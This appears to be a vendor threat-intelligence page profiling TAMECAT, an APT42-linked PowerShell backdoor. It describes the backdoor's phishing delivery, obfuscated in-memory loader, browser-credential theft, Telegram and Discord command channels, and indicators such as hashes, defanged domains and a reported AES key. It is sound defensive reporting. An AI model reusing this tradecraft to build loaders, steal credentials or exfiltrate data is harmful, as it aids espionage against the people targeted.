TAMECAT
TAMECAT is a modular PowerShell-based backdoor used in espionage operations and attributed in the provided reporting to the Iranian state-sponsored actor APT42; some reporting also associates related activity and tooling overlap with SpearSpecter and GreenCharlie. It is described as operating largely in memory/filelessly to minimize forensic artifacts and evade detection. Reported targeting includes senior defense and government officials, defense and government organizations, NGOs, media, educational institutions, activists, legal services, and family members of officials.
The described intrusion chain begins with social engineering, including long-term rapport building and WhatsApp-based lures, followed by delivery of a malicious file or link. Multiple reports describe an initial VBScript downloader that queries installed antivirus products via WMI and conditionally launches PowerShell via conhost or uses cmd.exe/curl to retrieve later stages. The loader, reported as nconf.txt hosted on tebi[.]io, is heavily obfuscated and uses Base64 decoding, custom byte/bit transformations, and AES decryption to release functional modules only after decryption.
TAMECAT supports reconnaissance, file harvesting, browser data theft, screenshot capture, and remote command execution. Reported capabilities include collecting OS version and computer name, generating victim-specific identifiers, writing an identifier to %LocalAppData%\config.txt, creating a Chrome directory under %LocalAppData%, stealing browser data from Microsoft Edge and Google Chrome via remote debugging, suspending browser processes to access cached credentials and passwords, capturing screenshots, crawling the filesystem for documents of interest, and downloading/executing additional scripts or code. Command handling described in the content parses decrypted C2 responses into language, command, thread name, and start/stop fields, with support for PowerShell or C# execution and actions such as downloadutils, start, and stop.
Its command-and-control and exfiltration traffic is described as encrypted and obfuscated. The content states TAMECAT has encoded C2 traffic with Base64 and uses AES encryption for communications and stolen data. Multiple reports cite the AES key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B for encrypted content/exfiltration, with a randomly generated 16-character IV transmitted in an HTTP header named Content-DPR. One loader-related value T2r0y1M1e1n1o0w1 is also reported, and one analysis lists IV 0T9r1y1M2e0N0o1w in the script. TAMECAT forges browser user-agent strings and uses HTTP POST requests for exfiltration. Reported C2 channels and infrastructure include HTTPS, Telegram bots, Discord, Cloudflare Workers, WebDAV, Firebase, and accurate-sprout-porpoise[.]glitch[.]me; darijo-bosanac-dl[.]workers[.]dev and tebi[.]io are also mentioned in the delivery/C2 chain.
High-confidence indicators directly mentioned in the content include the VBScript SHA-256 5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422, loader nconf.txt SHA-256 bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8, loader MD5 081419a484bbf99f278ce636d445b9d8, the hardcoded token GILNH9LX6TCZ9V8ZZSUF, and infrastructure including accurate-sprout-porpoise[.]glitch[.]me, darijo-bosanac-dl[.]workers[.]dev, and tebi[.]io.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
TAMECAT’s attack flow is highly automated, proceeding from initial user interaction with a malicious file to complete data exfiltration without perceptible intrusion.
Iran APT SpearSpecter Uses Weeks-Long WhatsApp Lures and Fileless TAMECAT Backdoor to Hit Defense
“GreenCharlie’s toolset centers on a multi-stage PowerShell-based malware framework, including variants known as GORBLE, TAMECAT, and POWERSTAR.”
Analysis of recent campaigns introduces TameCat, a modular, PowerShell-based backdoor used to target senior defense and government officials.
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 techniqueUtilizes not only dedicated servers but also social platforms such as Discord and Telegram as backup control channels
Resource Development
1 technique"The group utilizes the commercial registrar Namecheap to register domains that are thematically aligned with their social engineering lures..."
Initial Access
3 techniquesInitial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links.
The attack typically originates from a spear-phishing email disguised as official correspondence, with an attachment that appears to be an ordinary document but actually contains embedded VBScript.
Initial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links
Execution
6 techniquesUpon execution, it immediately queries the target device’s installed antivirus software list via WMI
which tend to rely on the use of command and scripting interpreters (T1059) like PowerShell (T1059.001).
it invokes conhost to launch PowerShell and retrieves the core payload via remote download utilities
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
with an attachment that appears to be an ordinary document but actually contains embedded VBScript. This script functions as a “reconnaissance operative.”
“phishing (T1566) … often leading to execution via user execution (T1204) of malicious files …”
Persistence
1 techniquePrivilege Escalation
2 techniquesFileless Execution : Operates entirely in memory without writing any malicious files to disk, making detection by traditional antivirus software extremely difficult.
Stealth
5 techniquesCommand Obfuscation : Utilizes ambiguous expressions to replace plaintext execution commands, evading script detection mechanisms; AES Double Encryption : Core code is first Base64-encoded, then subjected to high-strength encryption
Forges browser user-agent strings to masquerade as legitimate network traffic
Fileless Execution : Operates entirely in memory without writing any malicious files to disk, making detection by traditional antivirus software extremely difficult.
“weaponizing LOLBins, including … Rundll32” / “rundll32.exe … davclnt.dll, DavSetCookie … .lnk”
GhostForm RAT via in-memory PowerShell execution within invisible Windows forms
Credential Access
4 techniquesThe backdoor's capabilities span keylogging, screen capture, browser credential and session cookie theft
browser credential and session cookie theft
Browser Data Theft : Extracts data from mainstream browsers via remote debugging, suspending browser processes to read cached credentials, passwords, and other sensitive information
During the credential access phase, Iranian-linked attackers have prioritized stealing credentials from web browsers (T1555.003)
Discovery
4 techniquesUpon execution, it immediately queries the target device’s installed antivirus software list via WMI
For discovery, system information discovery (T1082) and file and directory discovery (T1083) have been the most prevalent methods used to map the environment.
APT42 has used a VBScript to query anti-virus products. TAMECAT has used VBScript to query anti-virus products.
Collection
3 techniquesThe backdoor's capabilities span keylogging, screen capture, browser credential and session cookie theft
Screen Surveillance : Captures screenshots silently to comprehensively record target operational trajectories
The backdoor's capabilities span keylogging, screen capture, browser credential and session cookie theft, email collection
Command and Control
6 techniquesCommand Reception : Receives control commands via Telegram bots, enabling download of additional scripts, execution of various code types, and flexible termination of attack processes.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
it invokes conhost to launch PowerShell and retrieves the core payload via remote download utilities
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
"GreenCharlie leveraged dynamic DNS (DDNS) to establish and manage its infrastructure..."
Exfiltration
1 techniqueCollected sensitive data is encrypted and transmitted to control servers via network requests.
IOCs tracked for this family
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
17 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A modular, fileless malware that uses VBScript phishing and PowerShell-based staged delivery, decrypts payloads in memory, steals browser credentials and system information, captures screenshots, receives commands via Telegram bots, and exfiltrates encrypted data through C2 channels including dedicated servers, Discord, and Telegram.
A modular backdoor implemented in PowerShell, used for targeted intrusions against senior defense and government officials.
PowerShell-based backdoor used in long-term espionage that steals credentials from Edge/Chrome (via browser debugging), performs host reconnaissance, persists via files in %LocalAppData%, and exfiltrates data encrypted over HTTPS/Telegram/Discord-based C2.
PowerShell in-memory backdoor used by APT42 for surveillance, credential theft, screen capture, keylogging, reconnaissance, and exfiltration over multiple C2 channels.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.